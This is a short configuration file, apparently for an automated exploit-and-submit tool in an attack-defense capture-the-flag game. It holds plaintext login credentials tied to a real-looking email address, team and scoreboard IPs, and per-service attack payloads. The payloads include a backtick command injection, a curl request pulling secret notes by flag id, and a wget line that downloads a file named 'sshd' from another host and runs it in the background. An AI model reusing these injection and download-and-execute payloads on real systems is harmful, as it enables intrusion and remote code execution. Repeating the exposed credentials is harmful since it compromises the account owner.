[login]

team-ip = 35.160.215.67
username = surajshah525@gmail.com
password = 2cZXX5C6bBMq
scoreboard = 34.210.90.208

####faketeam
##username = sheep@example.com
##password = sheep

[links]

project-proposal = https://docs.google.com/a/asu.edu/document/d/146tz2zVrMgf2qbLYtt8Zf0DmHRuE8IytSX4QG_1tbgA/edit?usp=sharing

[vulnerability]
#you can use <flag-id> or <token-id> or one of the following:
#VARIABLES = ["<flag-id>","<token-id>","<port>","<team-id>"]

service1 = \n<flag-id>
service2 = 2\n`ls`\n123\n
service3 = curl http://<team-id>:<port>/secret.cgi?note_id=<flag-id>
service4 = `2\nwget team2:8888/sshd -P /tmp/; sh /tmp/sshd &;\n123\n`

[submit-parameters]

nc-timeout = 20
submit-timestep = 30
